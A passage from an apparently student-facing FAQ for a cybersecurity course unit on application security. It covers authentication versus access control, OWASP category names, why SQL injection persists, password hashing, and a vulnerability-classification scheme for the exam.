Authentication answers "are you who you say you are?" Access control answers "are you allowed to do this specific thing?" A successful login is authentication. Refusing to let you view someone else's records is access control. On the exam, if the attacker logged in without valid credentials, classify it as broken authentication. If they logged in as themselves but saw data they shouldn't, classify it as broken access control.
Q: I keep seeing "sensitive data exposure" and "cryptographic failures" used interchangeably. Which is correct?
Both refer to the same OWASP category. The 2017 edition called it "Sensitive Data Exposure." The 2021 edition renamed it to "Cryptographic Failures" to emphasize that the root cause is usually a cryptographic choice (no encryption, weak encryption, weak hashing). Either name is acceptable on the AP exam.
Q: How is SQL injection still a thing in 2026? Isn't it solved?
Parameterized queries solve it completely. But legacy codebases are enormous, developers copy vulnerable code from tutorials, and new injection variants appear as new query languages emerge (NoSQL injection, GraphQL injection). Injection remains in the OWASP Top 10 because new applications keep making the same mistake.
Q: Why do we hash passwords instead of encrypting them?
Encryption is reversible by design — if someone holds the key, they can decrypt. Hashing is one-way. When a user logs in, the system hashes what they typed and compares it to the stored hash. It never needs to recover the original password. This means even a full database breach does not immediately expose passwords — attackers must crack each hash, which with bcrypt or Argon2 takes prohibitive time per password. Unit 5.3 covers this in depth.
Q: What is the single most useful thing to memorize for application security on the exam?
The three-category triage from section 5.1.10: (1) input as code = injection; (2) identity or permission failure = broken auth or access control; (3) data revealed by how it was handled = sensitive data exposure. Ninety percent of Unit 5 application security questions are solved by getting this classification right, then picking the control that structurally addresses that category.